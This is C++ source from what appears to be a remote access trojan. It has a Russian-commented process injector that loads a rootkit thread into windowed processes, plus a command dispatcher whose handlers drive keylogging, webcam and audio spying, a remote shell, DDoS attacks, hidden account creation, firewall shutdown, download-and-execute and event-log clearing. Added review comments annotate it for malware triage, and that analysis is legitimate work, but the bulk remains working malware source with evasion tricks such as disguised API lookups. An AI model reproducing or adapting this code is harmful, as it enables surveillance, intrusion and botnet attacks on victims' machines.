//------------------------------------------------------ // InjectorProc - Основная функция инжектора, которая // постоянно мониторит запущенные процессы //------------------------------------------------------ DWORD WINAPI INJECTOR::InjectorProc(LPVOID) { // Алгоритм работы следующий: // Перебираем все кна рабочего стола и инжектимся // в поцесы владельцы BOT::Initialize(); INJKDBG("INJECTOR", "Запущен процесс инжектра"); TInjector Injector; Injector.IsWin64 = IsWIN64(); Injector.Injected = new TBotList(); Injector.NameBufSize = 1024; Injector.NameBuf = (LPBYTE)MemAlloc(Injector.NameBufSize); // Для старта определяем основную функцию руткита Injector.InjectFunction = RootkitThread; /* // Загружаем плагин INJKDBG("INJECTOR", "Загружаем bot.plug"); for (int i = 0; i < 2; i++) { LPVOID Plug = NULL; LPVOID PlugHandle = NULL; if (LoadBotPlug(&Plug, NULL)) { PlugHandle = MemoryLoadLibrary(Plug, false); Injector.InjectFunction = (TInjectFunction)MemoryGetProcAddress(PlugHandle, START_PROC_HASH); FreeBotPlug(Plug); } if (Injector.InjectFunction) break; // В случае ошибки получения адреса функции // принудительно обновляем плагин MemoryFreeLibrary(PlugHandle); UpdateBotPlug(); } if (!Injector.InjectFunction) pExitProcess(0); */ INJKDBG("INJECTOR", "Стартуем"); while (!BOT::Terminated()) { // Перебираем главные окна окна pEnumWindows(WndEnumCallBak, &Injector); pSleep(500); } // При завершении работы выходим из процесса pExitProcess(0); return 0; }
// Builds the window-list reply: runs EnumWindowsProc over the top-level
// windows, stamps the first byte of the resulting buffer with TOKEN_WSLIST
// and returns the buffer to the caller.
//
// NOTE(review): lpBuffer starts as NULL and is only passed by address to
// the callback, so the allocation presumably happens inside
// EnumWindowsProc (defined elsewhere). If the callback never allocates,
// the lpBuffer[0] write below dereferences NULL. Ownership of the returned
// buffer is not visible here; the caller presumably frees it.
LPBYTE CSystemManager::getWindowsList()
{
    LPBYTE lpBuffer = NULL;
    // The API name is assembled as a character array instead of a string
    // literal, and the function is resolved at run time rather than linked.
    // Presumably this keeps "EnumWindows" out of the import table and out of
    // simple string scans of the binary; the name is still observable at the
    // GetProcAddress call during dynamic analysis.
    char DYrEN66[] = {'E','n','u','m','W','i','n','d','o','w','s','\0'};
    // NOTE(review): the LoadLibrary handle is never released, and neither
    // the module handle nor the resolved pointer is checked before use.
    EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN66);
    pEnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer);
    // First byte is the reply-type token.
    lpBuffer[0] = TOKEN_WSLIST;
    return lpBuffer;
}
// Activation handling added (original note).
//
// Command dispatcher of the implant: lpBuffer[0] is a one-byte command code
// and the remaining bytes are that command's payload. Most commands start a
// worker thread through MyCreateThread and record its handle in m_hThread;
// a few run inline on the calling thread. The buffer is presumably the data
// received from the controller through m_pClient - confirm against the
// caller.
//
// Capability map for triage, as far as the case labels, handler names and
// original comments show: file manager, screen viewing, webcam, audio
// capture, remote shell, key logging, process/window and service
// management, registry editing, system information, DDoS start/stop,
// account and Guest changes, proxy, terminal-service (3389) and port
// changes, firewall stop, download-and-execute, URL opening (visible or
// hidden), message box, self-update, uninstall, event-log clearing and
// session shutdown. The handlers themselves are defined elsewhere.
//
// NOTE(review), from an analysis standpoint:
//  - Windows API functions are resolved with GetProcAddress(LoadLibrary(..))
//    on every call instead of being imported, so static import listings
//    understate what this function uses; the module handles are never
//    released.
//  - nSize is consulted only for COMMAND_OPEN_3389. Nothing here checks that
//    the buffer holds at least one byte or that a payload is long enough
//    (see the memcpy of sizeof(ATTACK) and the strcpy into temp_proc).
//  - m_hThread[m_nThreadCount++] is written with no bound check visible in
//    this function.
//  - Several workers receive lpBuffer + 1 directly; whether the buffer
//    outlives this call is not visible here.
//
// Parameters:
//   lpBuffer - command byte followed by the command payload.
//   nSize    - size of lpBuffer in bytes, as passed by the caller.
void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize)
{
    // Run-time resolution of the KERNEL32 / USER32 functions used below.
    typedef LONG (WINAPI *InterlockedExchangeT)
        (
        __inout LONG volatile *Target,
        __in    LONG Value
        );
    InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange");

    typedef VOID (WINAPI *SleepT)
        (
        __in DWORD dwMilliseconds
        );
    SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep");

    typedef HANDLE (WINAPI *CreateThreadT)(
        __in_opt  LPSECURITY_ATTRIBUTES lpThreadAttributes,
        __in      SIZE_T dwStackSize,
        __in      LPTHREAD_START_ROUTINE lpStartAddress,
        __in_opt  LPVOID lpParameter,
        __in      DWORD dwCreationFlags,
        __out_opt LPDWORD lpThreadId
        );
    CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread");

    typedef BOOL (WINAPI *CloseHandleT)
        (
        __in HANDLE hObject
        );
    // Name built as a character array rather than a literal, unlike the
    // other lookups in this function.
    char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'};
    CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm);

    typedef BOOL (WINAPI *EnumWindowsT)(
        __in WNDENUMPROC lpEnumFunc,
        __in LPARAM lParam);
    EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows");

    switch (lpBuffer[0])
    {
    case COMMAND_ACTIVED:
        // Atomically sets the "activated" flag.
        pInterlockedExchange((LONG *)&m_bIsActived, true);
        break;
    case COMMAND_LIST_DRIVE: // file management
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_FileManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL, false);
        break;
    case COMMAND_SCREEN_SPY: // screen viewing
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_ScreenManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL, true);
        break;
    case COMMAND_WEBCAM: // webcam
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_VideoManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_AUDIO: // audio monitoring
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_AudioManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_SHELL: // remote shell
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_ShellManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL, true);
        break;
    case COMMAND_KEYBOARD: // keystroke logging
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_KeyboardManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_SYSTEM: // system management, including processes and windows
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_SystemManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_SERMANAGER: // service management
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_SerManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_DDOS_ATTACK:
        {
            // Copies sizeof(ATTACK) bytes out of the payload without
            // consulting nSize, then constructs a DDOSManager from the copy.
            // The manager object goes out of scope at the closing brace, so
            // any lasting work is presumably started by its constructor.
            ATTACK m_Attack;
            memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK));
            DDOSManager m_DDOSManager(&m_Attack);
        }
        break;
    case COMMAND_DDOS_STOP:
        // NOTE(review): the stop command clears a flag named "Stoping"; its
        // polarity can only be confirmed where the flag is read.
        Stoping = FALSE;
        break;
    case COMMAND_REGEDIT: // registry management
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_RegeditManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_SYSINFO:
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_SysInfoManager,
            (LPVOID)m_pClient->m_Socket, 0, NULL);
        break;
    case COMMAND_NET_USER: // add a user account without using "net"
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)NETUSER,
            (LPVOID)(lpBuffer + 1), 0, NULL, true);
        break;
    case COMMAND_OPEN_PROXY: // start the proxy
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)OpenProxy,
            (LPVOID)(lpBuffer + 1), 0, NULL, true);
        break;
    case COMMAND_OPEN_3389:
        {
            // The only handler that is given a payload length.
            // NOTE(review): nSize is unsigned, so nSize -2 wraps around when
            // fewer than two bytes were received.
            Open3389((LPCTSTR)(lpBuffer + 1), nSize -2);
        }
        break;
    case COMMAND_GUEST: // enable the GUEST account
        OpenGuest();
        break;
    case COMMAND_STOPFIRE: // turn the firewall off
        StopFire();
        break;
    case COMMAND_CHANGE_PORT: // change the terminal (port)
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort,
            (LPVOID)(lpBuffer + 1), 0, NULL, true);
        break;
    case COMMAND_SENDMSG:
        {
            // Fire-and-forget thread: the handle is closed immediately and
            // is not tracked in m_hThread. The 500 ms sleep presumably gives
            // the thread time to read the payload it was handed.
            pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL));
            pSleep(500);
        }
        break;
    case COMMAND_DOWN_EXEC: // downloader
        m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)Loop_DownManager,
            (LPVOID)(lpBuffer + 1), 0, NULL, true);
        pSleep(100); // gives the worker time to take over its argument
        break;
    case COMMAND_OPEN_URL_SHOW: // open a web page, visible
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL);
        break;
    case COMMAND_OPEN_URL_HIDE: // open a web page, hidden
        OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE);
        break;
    case COMMAND_REMOVE: // uninstall
        UnInstallService();
        break;
    case COMMAND_CLEAN_EVENT: // clear the logs
        // If CleanEvent() clears the Windows event logs, as the original
        // comment says, the log-cleared records are the trace to look for.
        CleanEvent();
        break;
    case COMMAND_SESSION: // session management
        CSystemManager::ShutdownWindows(lpBuffer[1]);
        break;
    case COMMAND_RENAME_REMARK: // change the remark
        SetHostID((LPCTSTR)(lpBuffer + 1));
        break;
    case COMMAND_CHANGE_GROUP: // change the group
        SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS");
        break;
    case COMMAND_UPDATE_SERVER: // update the server component
        // The running copy is uninstalled only when the update succeeded.
        if (UpdateServer((char *)lpBuffer + 1))
            UnInstallService();
        break;
    case COMMAND_REPLAY_HEARTBEAT: // heartbeat reply
        break;
    case COMMAND_SORT_PROCESS: // process filter
        // Replies with a one-byte yes/no token depending on isProcesin().
        // Any exception is swallowed and no reply is sent in that case.
        try
        {
            if (isProcesin((LPTSTR)(lpBuffer + 1)))
            {
                BYTE bToken = TOKEN_INFO_YES;
                m_pClient->Send(&bToken, 1);
            }else
            {
                BYTE bToken = TOKEN_INFO_NO;
                m_pClient->Send(&bToken, 1);
            }
        }catch(...){}
        break;
    case COMMAND_SORT_WINDOW: // window filter
        // The payload is copied into temp_proc, every top-level window is
        // run through EnumWindowsList, and the reply depends on proc_tag,
        // which is presumably set by that callback on a match.
        // NOTE(review): the strcpy is unbounded, and temp_proc / proc_tag
        // are not declared in this function, so they are shared state.
        try
        {
            strcpy(temp_proc,(LPTSTR)(lpBuffer + 1));
            pEnumWindows(EnumWindowsList,0);
            if (proc_tag)
            {
                BYTE bToken = TOKEN_INFO_YES;
                m_pClient->Send(&bToken, 1);
                proc_tag = false;
            }else
            {
                BYTE bToken = TOKEN_INFO_NO;
                m_pClient->Send(&bToken, 1);
            }
        }catch(...){}
        break;
    }
}